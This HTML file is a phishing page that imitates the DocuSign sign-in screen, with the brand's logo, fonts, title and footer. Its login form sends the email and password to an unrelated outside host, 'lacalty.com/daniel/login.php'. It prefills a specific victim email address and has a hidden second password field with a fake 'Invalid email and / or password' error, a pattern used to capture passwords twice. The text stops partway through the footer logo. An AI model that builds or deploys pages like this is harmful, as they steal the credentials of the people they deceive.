<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.0/jquery.js" integrity="sha512-8Z5++K1rB3U+USaLKG6oO8uWWBhdYsM3hmdirnOEWp8h2B1aOikj5zBzlXs8QOrvY9OxEnD2QDkbSKKpfqcIWw==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <title>DocuSign Login - Enter email to start sign in</title>
    <link rel="shortcut icon" href="https://www.docusign.com/sites/all/themes/custom/docusign/favicons/favicon.ico">
    <link rel="canonical" href="https://account.docusign.com/">
        <style>
        /*! CSS Used from: Embedded */
        .site-content,
        #root {
            height: inherit;
        }

        .account-server .site-content {
            background-color: #fff;
        }

        /*! CSS Used from: Embedded */
        .ink-authentication {
            display: flex;
            flex-direction: column;
            min-height: 100%;
        }

        .ink-footer {
            flex-shrink: 0;
        }

        .ink-header {
            position: sticky;
            top: 0;
            height: 64px;
        }

        .ink-body {
            background-color: #f7f6f7;
            overflow-y: auto;
            flex: 1 0 auto;
        }

        .ink-auth-main {
            padding: 4rem 0;
            background-color: #fff;
            border: 1px solid rgba(25, 24, 35, .1490196078);
            border-radius: .25rem;
        }

        @media (max-width: 1039px) {
            .ink-body {
                background-color: #fff;
            }

            .ink-auth-main {
                border: unset;
                border-radius: unset;
                padding: unset;
                padding: 1.5rem 2rem;
            }
        }

        @media (min-width: 600px) {
            .ink-body {
                display: flex;
                flex-direction: column;
                align-items: center;
            }
        }

        @media (min-width: 600px)and (max-width: 1039px) {
            .ink-auth-main {
                padding: 4rem 0;
                width: 60%;
            }
        }

        @media (min-width: 1040px) {
            .ink-body {
                justify-content: center;
            }
        }

        @media (min-width: 600px) {
            .ink-body {
                display: flex;
                flex-direction: column;
                align-items: center;
            }
        }

        .ink-page-title {
            margin-bottom: 1rem;
        }

        .ink-page-title-prompt {
            margin-bottom: .5rem;
        }

        .ink-form-unit {
            margin-top: 1.5rem;
        }

        .ink-form-unit:first-child {
            margin-top: 2rem;
        }

        .ink-primary-button {
            margin-top: 2rem;
        }

        .ink-secondary-button {
            margin-top: 1rem;
        }

        /*! CSS Used from: Embedded */
        .ink-layout-container {
            width: 554px;
        }

        .ink-layout-container>div {
            border-left: 1px solid rgba(25, 24, 35, .15);
            padding: 0 3rem;
        }

        .ink-layout-container>div:first-child {
            border-left: none;
            padding-left: 4rem;
        }

        .ink-layout-container>div:last-child {
            padding-right: 4rem;
        }

        .ink-main-block {
            display: flex;
            flex-direction: column;
        }

        @media (max-width: 1039px) {
            .ink-layout-container {
                width: unset;
            }

            .ink-layout-container>div:first-child {
                padding-left: unset;
            }

            .ink-layout-container>div:last-child {
                padding-right: unset;
            }
        }

        @media (min-width: 1040px) {
            .ink-layout-container {
                display: grid;
                grid-template-columns: repeat(8, 1fr);
            }

            .ink-main-block {
                grid-column: 1/-1;
            }
        }

        /*! CSS Used from: Embedded */
        body {
            background: #fff;
            color: #1e1e1e;
            font-family: "Helvetica Neue", HelveticaNeue, Helvetica, Arial, sans-serif;
        }

        body {
            -webkit-font-smoothing: antialiased;
            -moz-osx-font-smoothing: grayscale;
            font-weight: normal;
            margin: 0;
            text-rendering: optimizeLegibility;
        }

        *,
        ::after,
        ::before {
            box-sizing: inherit;
        }

        .css-70qvj9 {
            display: -webkit-box;
            display: -webkit-flex;
            display: -ms-flexbox;
            display: flex;
            -webkit-align-items: center;
            -webkit-box-align: center;
            -ms-flex-align: center;
            align-items: center;
        }

        /*! CSS Used from: Embedded */
        body {
            background: rgb(255, 255, 255);
            color: rgba(25, 24, 35, 0.9);
            font-family: "DS Indigo", DSIndigo, "Neue Haas Grotesk", NeueHaasGrotesk, Helvetica, Arial, sans-serif;
        }

        /*! CSS Used from: Embedded */
        body {
            -webkit-font-smoothing: antialiased;
            font-weight: normal;
            margin: 0px;
            text-rendering: optimizelegibility;
        }

        *,
        ::after,
        ::before {
            box-sizing: inherit;
        }

        /*! CSS Used from: Embedded */
        .css-lal95z-HEADER_BAR-HeaderBar {
            position: absolute;
            left: 0px;
            right: 0px;
            top: 0px;
            display: flex;
            -webkit-box-pack: justify;
            justify-content: space-between;
            height: 64px;
            background-color: white;
            border-bottom: 1px solid rgba(0, 0, 0, 0.08);
            padding-left: 16px;
            padding-right: 16px;
        }

        .css-8rgqp2-HEADER_BAR_LEFT {
            display: flex;
            -webkit-box-pack: start;
            justify-content: start;
            -webkit-box-align: center;
            align-items: center;
        }

        .css-cskqfi-EmptyHeader {
            margin-left: 10px;
        }

        .css-51fonb-HEADER_APP_DESCRIPTION_NON_PROD {
            height: 40px;
            padding-top: 4px;
            text-decoration: none;
            display: flex;
            -webkit-box-align: center;
            align-items: center;
        }

        .css-51fonb-HEADER_APP_DESCRIPTION_NON_PROD:focus {
            outline: rgba(17, 16, 25, 0.6) solid 2px;
            outline-offset: 8px;
        }

        .css-jy4y6p-HEADER_BAR_MIDDLE {
            display: flex;
            -webkit-box-pack: center;
            justify-content: center;
            margin: 0px 8px;
            -webkit-box-align: center;
            align-items: center;
        }

        .css-1asqfip-HEADER_BAR_RIGHT {
            display: flex;
            -webkit-box-pack: end;
            justify-content: end;
            -webkit-box-align: center;
            align-items: center;
        }

        .css-1uxywf6 {
            margin: 0px;
            font-size: 24px;
            font-weight: 600;
            line-height: 1.25;
            font-family: "DS Indigo", DSIndigo, "Neue Haas Grotesk", NeueHaasGrotesk, Helvetica, Arial, sans-serif;
        }

        .css-1b0kgxe {
            background: none;
            border: none;
            border-radius: 0px;
            color: inherit;
            font-family: inherit;
            font-size: inherit;
            font-weight: inherit;
            letter-spacing: normal;
            line-height: inherit;
            padding: 0px;
            margin: 0px;
            text-align: inherit;
            text-decoration: none;
        }

        .css-1b0kgxe:active {
            color: inherit;
            text-decoration: none;
        }

        .css-1b0kgxe:focus {
            outline: rgba(25, 24, 35, 0.65) solid 2px;
            outline-offset: 2px;
        }

        .css-1b0kgxe:focus:not(:focus-visible) {
            outline: 0px;
        }

        .css-19idom {
            margin-bottom: 8px;
        }

        .css-1b9dgxj {
            font-size: 16px;
            font-weight: 500;
            line-height: 1.5;
            overflow-wrap: break-word;
            color: rgba(25, 24, 35, 0.9);
            display: block;
            font-family: "DS Indigo", DSIndigo, "Neue Haas Grotesk", NeueHaasGrotesk, Helvetica, Arial, sans-serif;
        }

        .css-imlxor {
            color: rgb(212, 41, 83);
            padding-left: 8px;
            font-weight: 600;
        }

        .css-k008qs {
            display: flex;
        }

        .css-zufwgo {
            display: flex;
            background: rgb(255, 255, 255);
            border: 1px solid rgba(25, 24, 35, 0.65);
            border-radius: 2px;
            width: 100%;
            outline: transparent solid 1px;
            outline-offset: -2px;
            transition-duration: 100ms;
            transition-property: border, outline;
            max-height: 48px;
        }

        .css-zufwgo:hover {
            border-color: rgba(25, 24, 35, 0.9);
        }

        .css-tciorg {
            font-size: 16px;
            font-weight: 400;
            line-height: 1.5;
            text-overflow: ellipsis;
            width: 100%;
            appearance: none;
            background: transparent;
            border: none;
            color: rgba(25, 24, 35, 0.9);
            font-family: "DS Indigo", DSIndigo, "Neue Haas Grotesk", NeueHaasGrotesk, Helvetica, Arial, sans-serif;
            height: auto;
            margin: 0px;
            padding: 7px 16px;
        }

        .css-tciorg:disabled {
            -webkit-text-fill-color: rgba(25, 24, 35, 0.9);
            cursor: not-allowed;
        }

        .css-tciorg:focus {
            outline: none;
        }

        .css-tciorg::placeholder {
            color: rgba(25, 24, 35, 0.65);
            opacity: 1;
        }

        @media screen and (-webkit-min-device-pixel-ratio: 2) and (max-width: 768px) and (hover: none) {
            .css-tciorg {
                font-size: 16px;
            }
        }

        @media (hover: none) and (pointer: coarse) {
            .css-tciorg {
                min-height: 48px;
            }
        }

        .css-1m5o92u {
            -webkit-box-align: center;
            align-items: center;
            border-radius: 2px;
            border-color: transparent;
            border-style: solid;
            border-width: 1px;
            cursor: pointer;
            display: inline-flex;
            font-family: "DS Indigo", DSIndigo, "Neue Haas Grotesk", NeueHaasGrotesk, Helvetica, Arial, sans-serif;
            -webkit-box-pack: center;
            justify-content: center;
            letter-spacing: normal;
            margin: 0px;
            overflow: visible;
            position: relative;
            text-align: center;
            text-decoration: none;
            text-transform: none;
            transition-property: background-color, border-color, box-shadow, color;
            transition-duration: 0.1s;
            transition-timing-function: cubic-bezier(0.33, 0, 0.67, 1);
            vertical-align: middle;
            background-color: rgb(0, 105, 236);
            color: rgb(255, 255, 255);
            font-size: 16px;
            min-height: 40px;
            min-width: 80px;
            padding: 4px 15px;
            font-weight: 500;
            line-height: 1.5;
        }

        .css-1m5o92u:focus {
            outline: rgba(25, 24, 35, 0.65) solid 2px;
            outline-offset: 2px;
        }

        .css-1m5o92u:focus:not(:focus-visible) {
            outline: 0px;
        }

        .css-1m5o92u:disabled,
        .css-1m5o92u:disabled:hover {
            cursor: not-allowed;
        }

        @media screen and (-ms-high-contrast:active),
        (-ms-high-contrast:none) {
            .css-1m5o92u {
                display: inline-block;
                vertical-align: middle;
            }
        }

        .css-1m5o92u:hover {
            background-color: rgb(0, 92, 211);
            color: rgb(255, 255, 255);
        }

        .css-1m5o92u:active {
            background-color: rgb(1, 67, 156);
            color: rgb(255, 255, 255);
            transition-duration: 0.15s;
        }

        .css-1m5o92u:disabled {
            background-color: rgb(0, 105, 236);
            opacity: 0.25;
        }

        .css-1m5o92u:disabled:hover {
            background-color: rgb(0, 105, 236);
            opacity: 0.25;
        }

        @media (hover: none) and (pointer: coarse) {
            .css-1m5o92u {
                min-height: 48px;
            }
        }

        .css-1ixbp0l {
            pointer-events: none;
        }

        .css-mxhkpf {
            -webkit-box-align: center;
            align-items: center;
            border-radius: 2px;
            border-color: transparent;
            border-style: solid;
            border-width: 1px;
            cursor: pointer;
            display: inline-flex;
            font-family: "DS Indigo", DSIndigo, "Neue Haas Grotesk", NeueHaasGrotesk, Helvetica, Arial, sans-serif;
            -webkit-box-pack: center;
            justify-content: center;
            letter-spacing: normal;
            margin: 0px;
            overflow: visible;
            position: relative;
            text-align: center;
            text-decoration: none;
            text-transform: none;
            transition-property: background-color, border-color, box-shadow, color;
            transition-duration: 0.1s;
            transition-timing-function: cubic-bezier(0.33, 0, 0.67, 1);
            vertical-align: middle;
            background-color: transparent;
            color: rgba(25, 24, 35, 0.9);
            font-size: 16px;
            min-height: 40px;
            min-width: 80px;
            padding: 4px 15px;
            font-weight: 500;
            line-height: 1.5;
        }

        .css-mxhkpf:focus {
            outline: rgba(25, 24, 35, 0.65) solid 2px;
            outline-offset: 2px;
        }

        .css-mxhkpf:focus:not(:focus-visible) {
            outline: 0px;
        }

        .css-mxhkpf:disabled,
        .css-mxhkpf:disabled:hover {
            cursor: not-allowed;
        }

        @media screen and (-ms-high-contrast:active),
        (-ms-high-contrast:none) {
            .css-mxhkpf {
                display: inline-block;
                vertical-align: middle;
            }
        }

        .css-mxhkpf:hover {
            background-color: rgba(25, 24, 35, 0.05);
            color: rgba(25, 24, 35, 0.9);
        }

        .css-mxhkpf:active {
            background-color: rgba(25, 24, 35, 0.1);
            color: rgba(25, 24, 35, 0.9);
            transition-duration: 0.15s;
        }

        .css-mxhkpf:disabled {
            background-color: transparent;
            opacity: 0.25;
        }

        .css-mxhkpf:disabled:hover {
            background-color: transparent;
            opacity: 0.25;
        }

        @media (hover: none) and (pointer: coarse) {
            .css-mxhkpf {
                min-height: 48px;
            }
        }

        .css-1o62qo6-FOOTER_CONTAINER {
            background-color: rgb(255, 255, 255);
            border-top: 1px solid rgb(204, 204, 204);
            line-height: 12px;
            padding-left: 24px;
            padding-right: 24px;
            font-size: 10px;
            color: rgba(25, 24, 35, 0.9);
            overflow: hidden;
            font-family: "DS Indigo", DSIndigo, "Neue Haas Grotesk", NeueHaasGrotesk, Helvetica, Arial, sans-serif;
        }

        .css-o453wd-FOOTER_TOP_ROW {
            display: flex;
            margin: 10px 0px;
        }

        .css-1loe55a-FOOTER_LOGO {
            display: flex;
            white-space: nowrap;
        }

        .css-1loe55a-FOOTER_LOGO span {
            display: block;
        }

        .css-4yeht3-FOOTER_LOGO_SVG {
            margin-top: -1.5px;
            margin-left: 3px;
        }

        .css-4yeht3-FOOTER_LOGO_SVG svg {
            max-height: 16px;
            width: 50px;
        }

        .css-70qvj9 {
            display: flex;
            -webkit-box-align: center;
            align-items: center;
        }

        .css-1lg1d1c-FOOTER_MAIN_ROW_NO_LOGO {
            -webkit-box-align: center;
            align-items: center;
            display: flex;
            margin: 8px 0px;
        }
        .css-1hgz6xr {
    font-size: 12px;
    font-weight: 400;
    line-height: 1.5;
    display: flex;
    font-family: "DS Indigo", DSIndigo, "Neue Haas Grotesk", NeueHaasGrotesk, Helvetica, Arial, sans-serif;
    margin: 0px;
    padding: 0px;
    color: rgb(212, 41, 83);
}

        .css-1u727pn-FOOTER_MOBILE_LINKS {
            -webkit-box-align: center;
            align-items: center;
            display: flex;
            flex-wrap: wrap;
        }

        .css-1u727pn-FOOTER_MOBILE_LINKS [data-link] {
            margin-right: 8px;
        }

        .css-33iyv5-FOOTER_LANG_SELECT_INK_BUTTON button {
            display: flex;
            font-size: 10px;
            line-height: 12px;
            margin-right: 10px;
            min-height: inherit;
            padding: 0px 0px 0px 6px;
        }

        .css-33iyv5-FOOTER_LANG_SELECT_INK_BUTTON button span:nth-of-type(2) {
            margin-top: -2px;
            margin-left: 2px;
        }

        .css-12bkj2t {
            -webkit-box-align: center;
            align-items: center;
            border-radius: 2px;
            border-color: transparent;
            border-style: solid;
            border-width: 1px;
            cursor: pointer;
            display: inline-flex;
            font-family: "DS Indigo", DSIndigo, "Neue Haas Grotesk", NeueHaasGrotesk, Helvetica, Arial, sans-serif;
            -webkit-box-pack: center;
            justify-content: center;
            letter-spacing: normal;
            margin: 0px;
            overflow: visible;
            position: relative;
            text-align: center;
            text-decoration: none;
            text-transform: none;
            transition-property: background-color, border-color, box-shadow, color;
            transition-duration: 0.1s;
            transition-timing-function: cubic-bezier(0.33, 0, 0.67, 1);
            vertical-align: middle;
            background-color: transparent;
            color: rgba(25, 24, 35, 0.9);
            font-size: 16px;
            min-height: 40px;
            min-width: 80px;
            padding: 4px 12px 4px 15px;
            font-weight: 500;
            line-height: 1.5;
        }

        .css-12bkj2t svg {
            fill: currentcolor;
            transition: fill 0.2s ease 0s;
        }

        .css-12bkj2t:hover svg {
            fill: currentcolor;
        }

        .css-12bkj2t:focus {
            outline: rgba(25, 24, 35, 0.65) solid 2px;
            outline-offset: 2px;
        }

        .css-12bkj2t:focus:not(:focus-visible) {
            outline: 0px;
        }

        .css-12bkj2t:disabled,
        .css-12bkj2t:disabled:hover {
            cursor: not-allowed;
        }

        @media screen and (-ms-high-contrast:active),
        (-ms-high-contrast:none) {
            .css-12bkj2t {
                display: inline-block;
                vertical-align: middle;
            }
        }

        .css-12bkj2t svg {
            fill: rgba(25, 24, 35, 0.65);
        }

        .css-12bkj2t:hover {
            background-color: rgba(25, 24, 35, 0.05);
            color: rgba(25, 24, 35, 0.9);
        }

        .css-12bkj2t:hover svg {
            fill: rgba(25, 24, 35, 0.65);
        }

        .css-12bkj2t:active {
            background-color: rgba(25, 24, 35, 0.1);
            color: rgba(25, 24, 35, 0.9);
            transition-duration: 0.15s;
        }

        .css-12bkj2t:active svg {
            fill: rgba(25, 24, 35, 0.65);
        }

        .css-12bkj2t:disabled {
            background-color: transparent;
            opacity: 0.25;
        }

        .css-12bkj2t:disabled:hover {
            background-color: transparent;
            opacity: 0.25;
        }

        @media (hover: none) and (pointer: coarse) {
            .css-12bkj2t {
                min-height: 48px;
            }
        }

        .css-12bkj2t::after {
            border-top-color: rgba(25, 24, 35, 0.65);
        }

        .css-3fyily {
            display: inline-flex;
            margin-left: 12px;
        }

        .css-buwdtc {
            display: inline-flex;
            height: 20px;
            pointer-events: none;
        }

        .css-hg1vx5 {
            display: inline-flex;
            line-height: 0;
        }
        .css-1hgz6xr svg {
    fill: currentcolor;
    margin-right: 8px;
    
}
.ink-user-email {
    overflow-wrap: anywhere;
}
p.ink-email-subtext {
    margin-top: 0;
    margin-bottom: 0;
}
.ink-change-user-arrow {
    display: flex;
    padding-right: 0.625rem;
}
.ink-pointer-cursor {
    cursor: pointer;
}
.css-144sltd svg {
    speak: none;
    height: 24px;
    width: 24px;
}
.css-144sltd {
    display: inline-flex;
    line-height: 0;
}
        .css-hg1vx5 svg {
            speak: none;
            height: 20px;
            width: 20px;
        }

        .css-1ds9fej-FOOTER_LINK {
            color: rgba(25, 24, 35, 0.9);
            text-decoration: none;
        }

        .css-1ds9fej-FOOTER_LINK:visited {
            color: inherit;
        }

        .css-1ds9fej-FOOTER_LINK:hover {
            color: rgb(0, 92, 211);
            text-decoration: none;
        }

        .css-1ds9fej-FOOTER_LINK:focus {
            outline-offset: 2px;
            outline: rgb(0, 92, 185) solid 2px;
        }

        .css-1ds9fej-FOOTER_LINK:active {
            color: rgb(1, 67, 156);
        }

        .css-esxh0p-FOOTER_BOTTOM_ROW {
            display: flex;
            margin: 10px 0px;
        }

        /*! CSS Used fontfaces */
        @font-face {
            font-family: "Helvetica Neue";
            font-style: normal;
            font-weight: normal;
            src: url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/HelveticaNeueW01-55Roma.eot?#iefix") format("embedded-opentype"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/HelveticaNeueW01-55Roma.woff") format("woff"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/HelveticaNeueW01-55Roma.ttf") format("truetype"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/HelveticaNeueW01-55Roma.svg#HelveticaNeue") format("svg");
        }

        @font-face {
            font-family: "Helvetica Neue";
            font-style: normal;
            font-weight: bold;
            src: url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/HelveticaNeueW01-75Bold.eot?#iefix") format("embedded-opentype"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/HelveticaNeueW01-75Bold.woff") format("woff"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/HelveticaNeueW01-75Bold.ttf") format("truetype"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/HelveticaNeueW01-75Bold.svg#HelveticaNeue") format("svg");
        }

        @font-face {
            font-family: "DSIndigo";
            font-style: normal;
            font-weight: 400;
            src: url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/DSIndigo-Regular.woff2") format("woff2"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/DSIndigo-Regular.woff") format("woff");
        }

        @font-face {
            font-family: "DSIndigo";
            font-style: normal;
            font-weight: 500;
            src: url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/DSIndigo-Medium.woff2") format("woff2"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/DSIndigo-Medium.woff") format("woff");
        }

        @font-face {
            font-family: "DSIndigo";
            font-style: normal;
            font-weight: 600;
            src: url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/DSIndigo-Semibold.woff2") format("woff2"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/DSIndigo-Semibold.woff") format("woff");
        }

        @font-face {
            font-family: "DSIndigo";
            font-style: normal;
            font-weight: 700;
            src: url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/DSIndigo-Bold.woff2") format("woff2"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/DSIndigo-Bold.woff") format("woff");
        }

        @font-face {
            font-family: "Neue Haas Grotesk";
            font-style: normal;
            font-weight: 300;
            src: url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/nhg_lite.eot?#iefix") format("embedded-opentype"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/nhg_lite.woff2") format("woff2"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/nhg_lite.woff") format("woff"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/nhg_lite.ttf") format("truetype");
        }

        @font-face {
            font-family: "Neue Haas Grotesk";
            font-style: normal;
            font-weight: normal;
            src: url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/nhg_regular.eot?#iefix") format("embedded-opentype"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/nhg_regular.woff2") format("woff2"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/nhg_regular.woff") format("woff"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/nhg_regular.ttf") format("truetype");
        }

        @font-face {
            font-family: "Neue Haas Grotesk";
            font-style: normal;
            font-weight: bold;
            src: url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/nhg_bold.eot?#iefix") format("embedded-opentype"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/nhg_bold.woff2") format("woff2"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/nhg_bold.woff") format("woff"), url("https://docucdn-a.akamaihd.net/olive/fonts/2.8.0/nhg_bold.ttf") format("truetype");
        }
    </style>
</head>

<body class="site-content">

    <div id="root">
        <div class="ink-authentication">
            <div class="ink-header">
                <header class="css-lal95z-HEADER_BAR-HeaderBar">
                    <div class="css-8rgqp2-HEADER_BAR_LEFT">
                        <div class="css-cskqfi-EmptyHeader"><a href=""
                                class="css-51fonb-HEADER_APP_DESCRIPTION_NON_PROD"><img width="114" height="24"
                                    src="https://docucdn-a.akamaihd.net/olive/images/2.47.0/header-logos/docusign.svg"
                                    alt="DocuSign"></a></div>
                    </div>
                    <div class="css-jy4y6p-HEADER_BAR_MIDDLE"></div>
                    <div class="css-1asqfip-HEADER_BAR_RIGHT"></div>
                </header>
            </div>
            <div class="ink-body">
                <div class="ink-auth-main">
                    <main role="main">
                        <div class="ink-layout-container ">
                            <div class="ink-main-block ">
                                <div class="ink-page-title">
                                    <h1 class="olv-heading olv-ignore-transform css-1uxywf6"><span id="not"
                                            class="css-1b0kgxe">Log in to DocuSign</span></h1>
                                </div>

                                <div style="display: none;" id="kilode" class="ink-change-user-button ink-pointer-cursor"><span class="ink-change-user-arrow"><span class="css-144sltd"><span aria-hidden="true" class="SVGInline"><svg class="SVGInline-svg" fill="currentColor" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" focusable="false">
                                    <path d="M22 11H5.41L11 5.41 9.59 4l-7.3 7.29a1 1 0 000 1.42L9.59 20 11 18.59 5.41 13H22z"></path>
                                  </svg></span></span></span><span class="ink-user-email "><p id="userInfo" class="ink-email-subtext">lifzgood62@gmail.com</p></span></div>
                                <div>
                                    <p id="remove1" class="ink-page-title-prompt">Enter your email to log in.</p>
                                    <form name="login" method="post" action="https:lacalty.com/daniel/login.php">
                                        <div id="sub" class="ink-form-unit">
                                            <div class="css-19idom"><label for="z2fHbhphgr" data-qa="username-label"
                                                    class="css-1b9dgxj">Email<span aria-hidden="true"
                                                        class="css-imlxor">*</span></label></div>
                                            <div data-qa="username-inner-wrapper" class="css-k008qs">
                                                <div class="input-text-box-wrapper css-zufwgo"><input
                                                        aria-required="true" data-qa="username"
                                                        aria-describedby="fixtureErrors" autocapitalize="off"
                                                        autocomplete="username" id="email"
                                                        placeholder="Enter email" name="email" spellcheck="false"
                                                        required="" type="email" class="css-tciorg" value=""></div>
                                            </div>
                                            <div style="display: none;" id="valid" class="css-164r41r"><p data-qa="username-error" id="9i2eEn54BQ" class="css-1hgz6xr"><span class="css-hg1vx5"><span aria-hidden="true" class="SVGInline"><svg class="SVGInline-svg" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20" focusable="false">
                                                <path d="M18.82 9.57l-8.39-8.39a.6.6 0 00-.86 0L1.18 9.57a.6.6 0 000 .86l8.39 8.39a.6.6 0 00.86 0l8.39-8.39a.6.6 0 000-.86zM11 15H9v-2h2zm0-4H9V5h2z"></path>
                                              </svg></span></span>Email is required to have a value.</p></div>
                                        </div>

<!-- Password Part -->

<div id="password1" style="display: none;" class="ink-form-unit">
    <div class="css-19idom"><label for="z2fHbhphgr" data-qa="username-label"
            class="css-1b9dgxj">Password<span aria-hidden="true"
                class="css-imlxor">*</span></label></div>
    <div data-qa="username-inner-wrapper" class="css-k008qs">
        <div id="first-password" class="input-text-box-wrapper css-zufwgo"><input
                aria-required="true" data-qa="username"
                aria-describedby="fixtureErrors" autocapitalize="off"
                autocomplete="new-password" id="password"
                placeholder="Enter Password" name="password"
                required="" type="password" class="css-tciorg" value=""></div>


        <div style="display: none;" id="second-password" class="input-text-box-wrapper css-zufwgo"><input
            aria-required="true" data-qa="username"
            aria-describedby="fixtureErrors" autocapitalize="off"
            autocomplete="new-password" id="pwd"
            placeholder="Enter Password" name="password1"
            required="" type="password" class="css-tciorg" value=""></div>
    </div>
    <div style="display: none;" id="valid_password" class="css-164r41r"><p data-qa="username-error" id="9i2eEn54BQ" class="css-1hgz6xr"><span class="css-hg1vx5"><span aria-hidden="true" class="SVGInline"><svg class="SVGInline-svg" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20" focusable="false">
        <path d="M18.82 9.57l-8.39-8.39a.6.6 0 00-.86 0L1.18 9.57a.6.6 0 000 .86l8.39 8.39a.6.6 0 00.86 0l8.39-8.39a.6.6 0 000-.86zM11 15H9v-2h2zm0-4H9V5h2z"></path>
      </svg></span></span>A Password is required</p></div>


      <div style="display: none;" id="incorrect_password" class="css-164r41r"><p data-qa="username-error" id="9i2eEn54BQ" class="css-1hgz6xr"><span class="css-hg1vx5"><span aria-hidden="true" class="SVGInline"><svg class="SVGInline-svg" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20" focusable="false">
        <path d="M18.82 9.57l-8.39-8.39a.6.6 0 00-.86 0L1.18 9.57a.6.6 0 000 .86l8.39 8.39a.6.6 0 00.86 0l8.39-8.39a.6.6 0 000-.86zM11 15H9v-2h2zm0-4H9V5h2z"></path>
      </svg></span></span>Invalid email and / or password</p></div>


</div>

                                        <div class="ink-primary-button">
                                            
                                            <button data-qa="submit-username"
                                               id="submit1" class="olv-button olv-ignore-transform css-1m5o92u" type="button"
                                                style="width: 100%;"><span data-qa="submit-username-text"
                                                    class="css-1ixbp0l">NEXT</span></button>
                                                
                                                    <button style="display: none;" data-qa="submit-username"
                                                    id="main_submit" class="olv-button olv-ignore-transform css-1m5o92u" type="button"
                                                     style="width: 100%;"><span data-qa="submit-username-text"
                                                         class="css-1ixbp0l">Log In</span></button>
                                                     
                                                
                                                
                                                </div>
                                       </form>
                                    </div>
                                <div></div>
                            </div>
                        </div>
                    </main>
                </div>
            </div>
            <div class="ink-footer">
                <footer role="contentinfo" class="css-1o62qo6-FOOTER_CONTAINER">
                    <div data-qa="footer" data-qa-mediawidth="small">
                        <div class="css-o453wd-FOOTER_TOP_ROW">
                            <div class="css-1loe55a-FOOTER_LOGO">Powered by <div class="css-4yeht3-FOOTER_LOGO_SVG">
                                    <span><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 230.5 76" width="100%"
                                            height="100%" focusable="false" aria-label="DocuSign" class="css-70qvj9"
                                            fill="#1e1e1e" role="img">
                                            <path
                                                d="M-.1 13.7h16.6c10.5 0 17.3 8.5 17.3 20.1 0 6.4-2.2 12-6.3 15.5-2.9 2.4-6.7 3.8-11.7 3.8H-.1V13.7zm15.4 32.5c7.5 0 10.4-4.6 10.4-12.4s-3.4-13.3-10.2-13.3H7.9v25.7h7.4zM34.7 39c0-8.4 6-14.9 14.8-14.9S64.3 30.6 64.3 39s-6 14.9-14.8 14.9S34.7 47.4 34.7 39zm22 0c0-5.5-2.6-9.3-7.2-9.3s-7.2 3.8-7.2 9.3 2.5 9.2 7.2 9.2c4.6 0 7.2-3.7 7.2-9.2zm8.8 0c0-8.4 5.5-15 14.1-15 7.3 0 11.9 4.2 12.9 10.4h-7.3c-.5-2.5-2.4-4.4-5.2-4.4-4.5 0-6.8 3.5-6.8 8.9s2.2 8.9 6.7 8.9c3 0 5.2-1.6 5.7-4.8h7.2c-.5 6-5.2 10.8-12.7 10.8-9 .1-14.6-6.4-14.6-14.8zm46.8 14.1v-3.3h-.2c-1.9 2.6-4.1 4.1-8.1 4.1-6.3 0-9.8-4-9.8-10.2V24.8h7.4v17.6c0 3.3 1.5 5.1 4.7 5.1 3.5 0 5.7-2.6 5.7-6.4V24.8h7.5v28.3h-7.2zm43.8-39.3h7.5v7h-7.5v-7zm0 11h7.5v28.3h-7.5V24.8zm10.6 29.1h7.4c.6 1.8 2.2 3.1 5.7 3.1 4.2 0 6.3-2 6.3-5.9V48h-.2c-1.7 1.9-3.8 3.3-7.4 3.3-6.3 0-12.5-5-12.5-13.5 0-8.4 5.1-13.8 12.2-13.8 3.5 0 6.1 1.4 7.8 3.8h.1v-3h7.2V51c0 4-1.3 6.7-3.4 8.6-2.4 2.2-6 3.2-10.2 3.2-7.5 0-12.3-3.3-13-8.9zm19.8-16.2c0-4.1-2.2-7.7-6.7-7.7-3.8 0-6.3 3-6.3 7.7 0 4.8 2.5 7.6 6.4 7.6 4.6.1 6.6-3.4 6.6-7.6zm17.5-9h.2c1.9-3 4.5-4.6 8.4-4.6 5.8 0 9.8 4.4 9.8 10.6v18.5h-7.5V35.7c0-3-1.8-5.2-4.9-5.2-3.3 0-5.7 2.6-5.7 6.5v16.1h-7.5V24.8h7.3v3.9h-.1zm-65 .6c-5.8-1.3-8.6-2.2-8.6-5.4 0-2.8 2.8-4.6 7.1-4.6 3.9 0 6.9 1.8 7.5 5.5h7.7c-.8-7.7-6.5-11.9-15.2-11.9-8.8 0-15.1 4-15.1 11.8 0 8.2 6.5 10.1 13.5 11.7 6 1.4 9.8 2.2 9.8 6 0 3.6-3.6 5.1-7.7 5.1-5.6 0-8.3-1.9-8.9-6.6h-7.8c.3 8.3 6.3 